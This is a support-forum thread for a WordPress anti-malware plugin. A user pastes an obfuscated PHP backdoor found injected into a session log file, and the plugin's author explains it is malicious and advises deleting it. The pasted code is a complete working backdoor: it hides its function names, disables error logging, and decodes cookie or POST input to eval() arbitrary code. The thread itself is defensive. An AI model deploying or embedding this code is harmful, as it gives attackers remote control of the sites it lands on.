Home › Forums › Support Forum › Interesting detection…
This topic contains 3 replies, has 2 voices, and was last updated by Anti-Malware Admin 6 years, 1 month ago.
-
AuthorPosts
-
October 31, 2018 at 8:14 am #2182
Scan found this location:
wp-content/plugins/gotmls/safe-load/_SESSION/.GOTMLS.69d73f2d111e766c58bafc8c8846db83.php
Had this code:
<?php $w9f53 = 265;$GLOBALS['vae0'] = Array();global $vae0;$vae0 = $GLOBALS;${“\x47\x4c\x4fB\x41\x4c\x53″}['m55bc753'] = “\x3d\x3e\x41\x22\x21\x3c\x7a\x5d\x63\x3b\x2e\x65\x4d\x72\x48\x69\x2a\x4c\x6f\x6a\x59\x73\x70\x47\x57\x36\x46\x24\x7d\x49\x32\xa\x56\x4e\x5c\x2c\x9\x43\x40\x4a\x27\x58\x4f\x35\x6b\x44\x31\x5e\x30\x5b\x51\x4b\x20\x6d\x34\x7e\x2d\x52\x71\x26\x7b\x6e\x5a\x37\x2f\x25\x60\xd\x78\x76\x66\x42\x50\x23\x29\x2b\x62\x28\x55\x38\x5f\x3f\x79\x61\x7c\x6c\x54\x45\x67\x74\x39\x77\x64\x3a\x53\x68\x75\x33″;$vae0[$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][8].$vae0['m55bc753'][97].$vae0['m55bc753'][76]] = $vae0['m55bc753'][8].$vae0['m55bc753'][95].$vae0['m55bc753'][13];$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]] = $vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][92];$vae0[$vae0['m55bc753'][58].$vae0['m55bc753'][76].$vae0['m55bc753'][25].$vae0['m55bc753'][43]] = $vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]] = $vae0['m55bc753'][21].$vae0['m55bc753'][89].$vae0['m55bc753'][13].$vae0['m55bc753'][85].$vae0['m55bc753'][11].$vae0['m55bc753'][61];$vae0[$vae0['m55bc753'][11].$vae0['m55bc753'][92].$vae0['m55bc753'][92].$vae0['m55bc753'][46]] = $vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][11].$vae0['m55bc753'][92];$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]] = $vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][15].$vae0['m55bc753'][80].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][89];$vae0[$vae0['m55bc753'][76].$vae0['m55bc753'][76].$vae0['m55bc753'][54].$vae0['m55bc753'][90].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][48]] = $vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][15].$vae0['m55bc753'][83].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][6].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][92].$vae0['m55bc753'][25].$vae0['m55bc753'][8].$vae0['m55bc753'][25]] = $vae0['m55bc753'][22].$vae0['m55bc753'][95].$vae0['m55bc753'][22].$vae0['m55bc753'][69].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][21].$vae0['m55bc753'][15].$vae0['m55bc753'][18].$vae0['m55bc753'][61];$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][8].$vae0['m55bc753'][92].$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][76]] = $vae0['m55bc753'][96].$vae0['m55bc753'][61].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][15].$vae0['m55bc753'][83].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][6].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][43]] = $vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][25].$vae0['m55bc753'][54].$vae0['m55bc753'][80].$vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][8].$vae0['m55bc753'][18].$vae0['m55bc753'][92].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][79].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][43].$vae0['m55bc753'][48].$vae0['m55bc753'][83]] = $vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][89].$vae0['m55bc753'][80].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][11].$vae0['m55bc753'][80].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][15].$vae0['m55bc753'][89];$vae0[$vae0['m55bc753'][44].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11].$vae0['m55bc753'][92]] = $vae0['m55bc753'][88].$vae0['m55bc753'][43].$vae0['m55bc753'][92].$vae0['m55bc753'][90].$vae0['m55bc753'][76].$vae0['m55bc753'][97].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]] = $vae0['m55bc753'][68].$vae0['m55bc753'][83].$vae0['m55bc753'][90].$vae0['m55bc753'][79];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][43].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][92]] = $_POST;$vae0[$vae0['m55bc753'][69].$vae0['m55bc753'][8].$vae0['m55bc753'][30].$vae0['m55bc753'][48].$vae0['m55bc753'][11].$vae0['m55bc753'][97].$vae0['m55bc753'][70]] = $_COOKIE;@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][13].$vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][80].$vae0['m55bc753'][85].$vae0['m55bc753'][18].$vae0['m55bc753'][88], NULL);@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][85].$vae0['m55bc753'][18].$vae0['m55bc753'][88].$vae0['m55bc753'][80].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][13].$vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][21], 0);@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][53].$vae0['m55bc753'][83].$vae0['m55bc753'][68].$vae0['m55bc753'][80].$vae0['m55bc753'][11].$vae0['m55bc753'][68].$vae0['m55bc753'][11].$vae0['m55bc753'][8].$vae0['m55bc753'][96].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][18].$vae0['m55bc753'][61].$vae0['m55bc753'][80].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][11], 0);@$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][79].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][43].$vae0['m55bc753'][48].$vae0['m55bc753'][83]](0);if (!$vae0[$vae0['m55bc753'][11].$vae0['m55bc753'][92].$vae0['m55bc753'][92].$vae0['m55bc753'][46]]($vae0['m55bc753'][2].$vae0['m55bc753'][17].$vae0['m55bc753'][57].$vae0['m55bc753'][87].$vae0['m55bc753'][2].$vae0['m55bc753'][45].$vae0['m55bc753'][20].$vae0['m55bc753'][80].$vae0['m55bc753'][57].$vae0['m55bc753'][78].$vae0['m55bc753'][33].$vae0['m55bc753'][80].$vae0['m55bc753'][97].$vae0['m55bc753'][25].$vae0['m55bc753'][25].$vae0['m55bc753'][83].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][97].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][76].$vae0['m55bc753'][30].$vae0['m55bc753'][46].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][46].$vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][46].$vae0['m55bc753'][83].$vae0['m55bc753'][48].$vae0['m55bc753'][30].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][83])){$vae0[$vae0['m55bc753'][58].$vae0['m55bc753'][76].$vae0['m55bc753'][25].$vae0['m55bc753'][43]]($vae0['m55bc753'][2].$vae0['m55bc753'][17].$vae0['m55bc753'][57].$vae0['m55bc753'][87].$vae0['m55bc753'][2].$vae0['m55bc753'][45].$vae0['m55bc753'][20].$vae0['m55bc753'][80].$vae0['m55bc753'][57].$vae0['m55bc753'][78].$vae0['m55bc753'][33].$vae0['m55bc753'][80].$vae0['m55bc753'][97].$vae0['m55bc753'][25].$vae0['m55bc753'][25].$vae0['m55bc753'][83].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][97].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][76].$vae0['m55bc753'][30].$vae0['m55bc753'][46].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][46].$vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][46].$vae0['m55bc753'][83].$vae0['m55bc753'][48].$vae0['m55bc753'][30].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][83], 1);$r613 = NULL;$a3f6d19 = NULL;$vae0[$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][11].$vae0['m55bc753'][46].$vae0['m55bc753'][92].$vae0['m55bc753'][54].$vae0['m55bc753'][43]] = $vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][97].$vae0['m55bc753'][30].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][56].$vae0['m55bc753'][92].$vae0['m55bc753'][97].$vae0['m55bc753'][48].$vae0['m55bc753'][70].$vae0['m55bc753'][56].$vae0['m55bc753'][54].$vae0['m55bc753'][76].$vae0['m55bc753'][8].$vae0['m55bc753'][54].$vae0['m55bc753'][56].$vae0['m55bc753'][90].$vae0['m55bc753'][76].$vae0['m55bc753'][8].$vae0['m55bc753'][90].$vae0['m55bc753'][56].$vae0['m55bc753'][63].$vae0['m55bc753'][70].$vae0['m55bc753'][8].$vae0['m55bc753'][25].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][30].$vae0['m55bc753'][83].$vae0['m55bc753'][63].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11];global $cee1d45;function xa98($r613, $x2871b){global $vae0;$fa85fe5d = “”;for ($t2fa871b7=0; $t2fa871b7<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($r613);){for ($sd312=0; $sd312<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($x2871b) && $t2fa871b7<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($r613); $sd312++, $t2fa871b7++){$fa85fe5d .= $vae0[$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][8].$vae0['m55bc753'][97].$vae0['m55bc753'][76]]($vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]]($r613[$t2fa871b7]) ^ $vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]]($x2871b[$sd312]));}}return $fa85fe5d;}function g5d9b3e($r613, $x2871b){global $vae0;global $cee1d45;return $vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]]($vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]]($r613, $cee1d45), $x2871b);}foreach ($vae0[$vae0['m55bc753'][69].$vae0['m55bc753'][8].$vae0['m55bc753'][30].$vae0['m55bc753'][48].$vae0['m55bc753'][11].$vae0['m55bc753'][97].$vae0['m55bc753'][70]] as $x2871b=>$kd935987e){$r613 = $kd935987e;$a3f6d19 = $x2871b;}if (!$r613){foreach ($vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][43].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][92]] as $x2871b=>$kd935987e){$r613 = $kd935987e;$a3f6d19 = $x2871b;}}$r613 = @$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][8].$vae0['m55bc753'][92].$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][76]]($vae0[$vae0['m55bc753'][44].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11].$vae0['m55bc753'][92]]($vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][43]]($r613), $a3f6d19));if (isset($r613[$vae0['m55bc753'][83].$vae0['m55bc753'][44]]) && $cee1d45==$r613[$vae0['m55bc753'][83].$vae0['m55bc753'][44]]){if ($r613[$vae0['m55bc753'][83]] == $vae0['m55bc753'][15]){$t2fa871b7 = Array($vae0['m55bc753'][22].$vae0['m55bc753'][69] => @$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][92].$vae0['m55bc753'][25].$vae0['m55bc753'][8].$vae0['m55bc753'][25]](),$vae0['m55bc753'][21].$vae0['m55bc753'][69] => $vae0['m55bc753'][46].$vae0['m55bc753'][10].$vae0['m55bc753'][48].$vae0['m55bc753'][56].$vae0['m55bc753'][46],);echo @$vae0[$vae0['m55bc753'][76].$vae0['m55bc753'][76].$vae0['m55bc753'][54].$vae0['m55bc753'][90].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][48]]($t2fa871b7);}elseif ($r613[$vae0['m55bc753'][83]] == $vae0['m55bc753'][11]){eval/*g7d8cc*/($r613[$vae0['m55bc753'][92]]);}exit();}} ?><?php $GLOBALS["GOTMLS"]["logins"]["69d73f2d111e766c58bafc8c8846db83"]=unserialize(base64_decode(“YToxOntzOjM6IkdFVCI7czoxNToiMTUzOTAyOTg2Ni42MDU3Ijt9″));
November 1, 2018 at 10:01 am #2183That is supposed to be a simple session log for login attempts on your site. All that other code added to the beginning of the file is a malicious injection that was inserted into that file at some later time. You should definitely let my scanner fix that file, or you can delete the file completely.
November 2, 2018 at 5:37 am #2184Is that a session code that expires? The majority of my issues are injection related…
November 2, 2018 at 9:58 am #2185The small bit of serialized code that my plugin originally put in that file does have an expiration date built into it but all that malicious code that was added to the top of that file has it’s own rules to live by and it needs to be removed before it has a chance to replicate itself into other files. As with all malicious injections, it is important to remove the malicious code as quickly as possible before it can spread to more of the files on your server. Quick containment and isolations is the key to getting clean and staying safe from further infection and future re-infection.
Since all the files in that _SESSION folder are temporary and not critical to the core functionality of your site you can delete the whole folder just to be safe. And session files that are needed to validate future login attampts will be recreated by my plugin anyway, and those will all be clean (at least until you get hit by another wave of infections).
-
AuthorPosts
You must be logged in to reply to this topic.